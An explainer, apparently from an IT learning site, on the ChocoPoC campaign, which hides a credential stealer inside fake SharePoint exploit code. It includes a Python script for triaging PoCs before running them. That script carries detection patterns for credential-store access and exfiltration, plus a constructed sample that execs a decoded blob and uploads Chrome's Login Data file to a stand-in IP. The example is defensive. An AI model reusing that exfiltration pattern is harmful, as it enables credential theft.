Attackers are distributing password-stealing malware disguised as proof-of-concept exploit code for a SharePoint vulnerability.
Security researchers hunting for software bugs have become targets themselves. A newly discovered campaign called ChocoPoC disguises credential-stealing malware as proof-of-concept (PoC) code that claims to demonstrate a flaw in Microsoft SharePoint, a widely used business collaboration platform. The malicious files are posted on GitHub, the code-sharing site where developers worldwide publish and collaborate on projects.
When someone runs the fake PoC believing it is legitimate security research, the malware silently harvests passwords and other login credentials stored on that computer, leaving no obvious signs of infection. The SharePoint vulnerability the PoC claims to demonstrate, tracked as CVE-2026-45659, lets an attacker run unauthorized code directly on a SharePoint server. The flaw is real and serious in its own right, which is exactly why researchers and defenders are hunting for working exploit code and why the fake PoC finds willing victims.
Government cybersecurity officials have formally recognized the flaw's severity by adding CVE-2026-45659 to their catalog of vulnerabilities known to be exploited in the wild. Note that it is the SharePoint vulnerability, not the ChocoPoC malware, that appears on that list.
This attack is clever because it exploits trust. Security researchers and IT professionals intentionally search for and test software vulnerabilities: it is their job to find problems before criminals do. By poisoning the very tools they use for this defensive work, attackers gain a foothold on the machines of skilled professionals who often hold elevated access to important systems and whose saved credentials are correspondingly valuable.
Think of it like compromising a locksmith's tools to steal from the homes they're trying to protect. The attacker gains entry through someone with legitimate access and expertise.
If you work with SharePoint or participate in security research, you face direct risk. Exploit code downloaded from untrusted sources could compromise your personal passwords, email accounts, and corporate credentials. For organizations, this is a supply-chain threat: attackers are weaponizing the defensive tools your security team depends on.
Even if you don't personally develop or test code, your company's security could be affected if your IT or security team unknowingly runs a trojanized PoC.
This incident demonstrates that cybersecurity professionals need the same protection and caution as everyone else: stay skeptical of code sources, keep SharePoint and other systems patched, and assume threats can arrive from unexpected directions. In practice that means reading a PoC before running it (a script that decodes an encoded blob and executes it, reads browser or cloud credential stores, or sends data to a hard-coded address it was never told about is not a PoC), running any exploit code only inside an isolated lab VM that holds no real credentials, and treating a GitHub star count or a convincing README as no evidence of safety.
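The kind of pre-run check described above, as an added example that is not code from the article and has no connection to the actual ChocoPoC files: a small static triage script that scans a downloaded PoC for the patterns a credential stealer almost always needs and a genuine SharePoint PoC almost never does. The indicator regexes, the categories, the two sample scripts it is run against, and the thresholds are all constructed for this example and should be tuned rather than treated as a signature set.

```python
"""
Static triage of a downloaded proof-of-concept script before anyone runs it.

Added example, not code from the original article and not derived from any
real PoC repository. It flags patterns that legitimate PoCs rarely need but
credential stealers almost always have: a blob that is decoded and executed,
reads of browser/cloud/SSH credential stores, and hard-coded exfiltration
destinations instead of the target the user supplies.
"""
import base64
import binascii
import re
import sys
from dataclasses import dataclass

# Heuristic indicators chosen for this example (hypothetical, not a vendor ruleset).
INDICATORS = [
    # exec/eval fed directly from a decoder: the real logic is hidden from review.
    ("decode_exec",
     re.compile(r"\b(?:exec|eval)\s*\(.*?\b(?:b64decode|decompress|unhexlify|fromhex)\b")),
    # Local secret stores a SharePoint PoC has no reason to touch.
    ("credential_store",
     re.compile(r"Login Data|Local State|logins\.json|\.git-credentials|"
                r"\.aws[/\\]credentials|CryptUnprotectData|[/\\]\.ssh[/\\]")),
    # A send/connect call whose destination is a string literal, not a variable.
    ("hardcoded_exfil",
     re.compile(r"\b(?:post|put|urlopen|connect|sendto)\s*\(\s*\(?\s*['\"]")),
    # Any URL that points at a bare IP address.
    ("literal_ip_url", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")),
]

# Long runs of base64 alphabet; each candidate is decode-validated below.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")

# Categories that alone justify refusing to run the file at all.
HARD_STOP = {"decode_exec", "credential_store"}


@dataclass(frozen=True)
class Finding:
    category: str
    line_no: int
    snippet: str


def triage_poc(source: str) -> list[Finding]:
    """Scan source text line by line and return every indicator hit."""
    findings: list[Finding] = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for category, pattern in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(category, line_no, line.strip()[:80]))
        for blob in BASE64_BLOB.findall(line):
            try:
                base64.b64decode(blob, validate=True)
            except binascii.Error:
                continue  # long identifier or hash, not decodable base64
            findings.append(Finding("base64_blob", line_no, f"{len(blob)}-char base64 literal"))
    return findings


def verdict(findings: list[Finding]) -> str:
    """'do_not_run' on a hard-stop hit, 'review' on anything else, 'clean' on none."""
    categories = {f.category for f in findings}
    if categories & HARD_STOP:
        return "do_not_run"
    return "review" if categories else "clean"


# Constructed sample inputs for the demonstration (not from any real repository).
# The encoded "payload" is a harmless print statement, made long enough to trip the blob check.
_FAKE_BLOB = base64.b64encode(b"print('placeholder, not a real payload')\n" * 4).decode()

BENIGN_POC = """\
import sys
import requests

target = sys.argv[1]  # the SharePoint host the tester chooses
r = requests.post(target + "/_api/web", data={"probe": "1"})
print(r.status_code)
"""

SUSPICIOUS_POC = f"""\
import base64, os, requests

PAYLOAD = "{_FAKE_BLOB}"
exec(base64.b64decode(PAYLOAD))
db = os.path.expanduser("~/AppData/Local/Google/Chrome/User Data/Default/Login Data")
requests.post("http://203.0.113.7/upload", files={{"f": open(db, "rb")}})
"""


if __name__ == "__main__":
    # Usage: python triage.py some_poc.py   (no argument: run on the built-in samples)
    sources = {sys.argv[1]: open(sys.argv[1], encoding="utf-8", errors="replace").read()} \
        if len(sys.argv) > 1 else {"benign_sample": BENIGN_POC, "suspicious_sample": SUSPICIOUS_POC}
    for name, src in sources.items():
        hits = triage_poc(src)
        print(f"{name}: {verdict(hits)}")
        for h in hits:
            print(f"  line {h.line_no:3d} [{h.category}] {h.snippet}")
```

The benign sample sends traffic only to the host the tester names on the command line and comes back clean; the suspicious sample trips every category and is rated do_not_run. The script is a first filter, not a safety guarantee: a stealer can hide behind a packer or a second-stage download that no regex will see, so a PoC that passes triage still belongs in a throwaway lab VM with no real credentials on it.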
Want to understand the technology behind this story? ITVedas has beginner-friendly guides on every IT topic.